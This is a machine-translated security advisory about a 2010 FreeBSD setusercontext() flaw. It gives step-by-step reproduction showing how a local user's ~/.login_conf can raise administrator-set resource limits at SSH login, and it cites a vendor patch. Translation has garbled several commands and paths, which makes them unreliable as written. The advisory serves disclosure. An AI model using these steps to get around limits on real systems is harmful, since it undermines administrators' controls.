FreeBSD setusercontext () function bypass security restriction Vulnerability
Release date: 2010-08-18
Updated on: 2010-08-19
Affected Systems:
FreeBSD 8.0
FreeBSD 7.2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 42533
FreeBSD is an open-source Unix system that runs on the Intel Platform and can be freely used.
The setusercontext () function in the lib/libutil/login_class.c file is used to apply specific user settings when running with the permissions of other users. This allows local users to create special ~ /. Login_conf file and use OpenSSH to log on to change some restricted resources.
<* Source: Andrey Zonov (andrey.zonov@gmail.com)
Link: http://secunia.com/advisories/40923/
Http://www.freebsd.org/cgi/query-pr.cgi? Pr = 1, 141840
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
1. Add a new logon class in/etc/login. conf.
Test :\
: Cputime = 1 h :\
: Tc = default:
2. Make db
# Cap_mkdb/etc/login. conf
3. Change the Account Logon class
# Pw usermod $ login-L test
4. Connect to the host using SSH Through $ login and execute limits-
$ Limits-
Resource limits (current ):
Cputime 3600 secs
Filesize infinity kB
Datasize 524288 kB
Stack size 65536 kB
Coredumpsize infinity kB
Memoryuse infinity kB
Memorylocked infinity kB
Maxprocesses 3603
Openfiles 7207
Sbsize infinity bytes
Vmemoryuse infinity kB
Pseudo-terminals infinity
Swapuse infinity kB
5. Create ~ /. Login_conf
Me :\
: Cputime = 2 h:
6. Connect to the host again and execute limits-
$ Limits-
Resource limits (current ):
Cputime 7200 secs
Filesize infinity kB
Datasize 524288 kB
Stack size 65536 kB
Coredumpsize infinity kB
Memoryuse infinity kB
Memorylocked infinity kB
Maxprocesses 3603
Openfiles 7207
Sbsize infinity bytes
Vmemoryuse infinity kB
Pseudo-terminals infinity
Swapuse infinity kB
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
FreeBSD
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.freebsd.org/cgi/query-pr.cgi? Pr = 1, 141840